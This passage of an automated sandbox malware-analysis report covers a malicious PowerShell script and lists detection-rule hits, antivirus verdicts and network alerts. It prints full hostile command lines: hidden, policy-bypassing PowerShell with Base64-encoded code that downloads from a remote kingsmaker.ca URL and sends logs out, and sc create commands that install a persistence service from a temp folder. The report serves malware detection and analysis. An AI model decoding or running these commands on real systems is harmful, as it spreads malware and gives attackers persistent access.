AGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgB
        Source: Event LogsAuthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro: Data: ContextInfo: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1151 Host ID = 7c34b11a-dd38-4e83-bc1c-56ca8e9b96f9 Host Application = powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA= Engine Version = 5.1.19041.1151 Runspace ID = 28b82a9c-9682-4531-a4e1-809c4e307f7d Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = computer\user Connected User = Shell ID = Microsoft.PowerShell, EventID: 4103, Payload: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.Windows.Forms", Source: Microsoft-Windows-PowerShell, UserData: , data0: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1151 Host ID = 7c34b11a-dd38-4e83-bc1c-56ca8e9b96f9 Host Application = powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA= Engine Version = 5.1.19041.1151 Runspace ID = 28b82a9c-9682-4531-a4e1-809c4e307f7d Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = computer\user Connected User = Shell ID = Microsoft.PowerShell, data1: , data2: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.Windows.Forms"
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, CommandLine: powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6676, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, ProcessId: 6220, ProcessName: powershell.exe
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_6.ca.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_6.ca.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4928, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_6.ca.ps1", ProcessId: 3620, ProcessName: powershell.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_6.ca.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3620, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline", ProcessId: 6124, ProcessName: csc.exe
        Source: Process startedAuthor: frack113: Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgB
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, CommandLine: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\Temp\myRdpService.exe cakoi7, ParentImage: C:\Windows\Temp\myRdpService.exe, ParentProcessId: 5496, ParentProcessName: myRdpService.exe, ProcessCommandLine: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, ProcessId: 6676, ProcessName: cmd.exe
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3620, TargetFilename: C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline
        Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net start "myRdpService", CommandLine: net start "myRdpService", CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1368, ParentProcessName: cmd.exe, ProcessCommandLine: net start "myRdpService", ProcessId: 8060, ProcessName: net.exe
        Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto , CommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto , CommandLine|base64offset|contains: H, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1368, ParentProcessName: cmd.exe, ProcessCommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto , ProcessId: 7920, ProcessName: sc.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_6.ca.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_6.ca.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4928, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_6.ca.ps1", ProcessId: 3620, ProcessName: powershell.exe
        Source: Process startedAuthor: frack113: Data: Command: sc query myRdpService, CommandLine: sc query myRdpService, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc query myRdpService, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 9840, ParentProcessName: cmd.exe, ProcessCommandLine: sc query myRdpService, ProcessId: 9928, ProcessName: sc.exe
        Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net start "myRdpService", CommandLine: net start "myRdpService", CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1368, ParentProcessName: cmd.exe, ProcessCommandLine: net start "myRdpService", ProcessId: 8060, ProcessName: net.exe

        Data Obfuscation

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_6.ca.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3620, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline", ProcessId: 6124, ProcessName: csc.exe
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-29T09:10:27.776392+010028033053Unknown Traffic192.168.11.3049761172.67.179.67443TCP
        2024-11-29T09:11:30.992987+010028033053Unknown Traffic192.168.11.3049766172.67.179.67443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-29T09:09:01.270765+010028032742Potentially Bad Traffic192.168.11.3049737172.67.179.67443TCP
        2024-11-29T09:09:03.420947+010028032742Potentially Bad Traffic192.168.11.3049739172.67.179.67443TCP
        2024-11-29T09:09:26.789807+010028032742Potentially Bad Traffic192.168.11.3049755172.67.179.67443TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: C:\Windows\Temp\svczHost.exeAvira: detection malicious, Label: TR/AVI.Agent.izors
        Source: C:\Windows\Temp\svczHost.exeReversingLabs: Detection: 66%
        Source: unknownHTTPS traffic detected: 172.67.179.67:443 -> 192.168.11.30:49735 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.179.67:443 -> 192.168.11.30:49743 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.179.67:443 -> 192.168.11.30:49744 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.179.67:443 -> 192.168.11.30:49761 version: TLS 1.2
        Source: Binary string: .pdbpdbtem.pdbD source: powershell.exe, 00000009.00000002.4154450229.000001BD75AF7000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ?\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.3074920696.0000015B6D4E2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: b.pdb- source: powershell.exe, 00000009.00000002.4154450229.000001BD75AF7000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior

